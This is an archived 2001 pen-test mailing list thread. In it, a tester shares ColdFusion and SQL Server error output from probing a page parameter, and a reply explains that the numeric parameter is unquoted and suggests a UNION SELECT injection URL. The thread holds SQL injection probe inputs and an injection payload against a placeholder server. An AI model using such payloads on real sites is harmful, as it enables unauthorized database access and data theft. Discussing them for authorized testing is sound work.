Re: CFM SQL injection

From: Kevin Spett (kspett@spidynamics.com)
Date: 12/18/01


From: "Kevin Spett" <kspett@spidynamics.com>
To: <Chili@SexMagnet.com>, <pen-test@security-focus.com>
Date: Mon, 17 Dec 2001 15:39:29 -0800


    It looks like the query that you're attacking isn't prepending and
appending quotes to your input. The string build probably looks a lil'
sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID =
" & strPageID

    This means that there is no need to use quotes in order to perform a
successful injection. So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM
OtherTable WHERE 1=1

    Hopefully this will return an error complaining about an invalid table
name, or at least another error that may give you a better idea of what the
web application is doing with your argument.

Kevin Spett
Archbishop of SQL Injection
SPI Dynamics, Inc.

----- Original Message -----
From: "Charlie Liserne" <Chili@SexMagnet.com>
To: <pen-test@securityfocus.com>
Sent: Saturday, December 15, 2001 2:22 PM
Subject: CFM SQL injection

> Hello guys,
>
> I'm performing a pen-test against a web with Coldfusion installed. I
obtain
> some error information, but I'm not able to do nothing because the server
> never understand the parameters I send.
>
> The correct page is as follows:
> http://www.server.com/page.cfm?page_id=8
>
> My probes are following:
>
> -------------------
> Request: http://www.server.com/page.cfm?page_id=8'
>
> Result:
> Invalid parameter type
> Cannot convert 19' to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
of
> (CFPARAM), occupying document position (5:1) to (5:61).
> Template: c:\blabla\page.cfm
> Query String: page_id=19'
> ------------------------
>
> So it isn't interpreting the ' and I don't know how to execute commands.
It
> seems that it is not an SQL issue, instead it looks a coldfusion error.
> Another probe follows:
>
> --------------------
> Request: http://www.server.com/page.cfm?page_id=0
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near '='.
> The error occurred while processing an element with a general identifier
of
> (CFQUERY), occupying document position (15:1) to (16:65).
> ------------------
>
> Okay, i get an error from the SQL database. But still don't know how to
> take advantage of it. I don't know the database name and I have very
little
> info about it.
>
> Also, there are two more interesting probes:
> ---------------------------
> Request:http://www.server.com/page.cfm?page_id=3,
>
> Result:
> Invalid parameter type
> Cannot convert 3, to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
of
> (CFPARAM), occupying document position (5:1) to (5:61).
> ----------------------------
> Request: http://www.server.com/page.cfm?page_id=3,4
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near ','.
> The error occurred while processing an element with a general identifier
of
> (CFQUERY), occupying document position (6:1) to (6:72).
> -------------------------------
>
> Do you know how to exploit this (if it's possible)?
>
> Regards,
> Charlie.
>
>
>
>
> --------------------------------------------------------------------------

--
> This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/
>
>

---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/



Relevant Pages

  • Re: faster scans? (nmap)
    ... one host using nmap for syn scans in burst mode with the ... >>>This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Re: pen test help please asap
    ... > Machine A on client site makes a configurable encrypted OUTBOUND ... > This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • Re: ettercap help
    ... Anyways have never tried Ettercap for VNC. ... > This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • Re: ettercap help
    ... > I can get it to sniff telnet, ftp, pop, smb, but no vnc. ... > This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Re: Wardialing
    ... >>> achieving the connection with the modem. ... >>This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)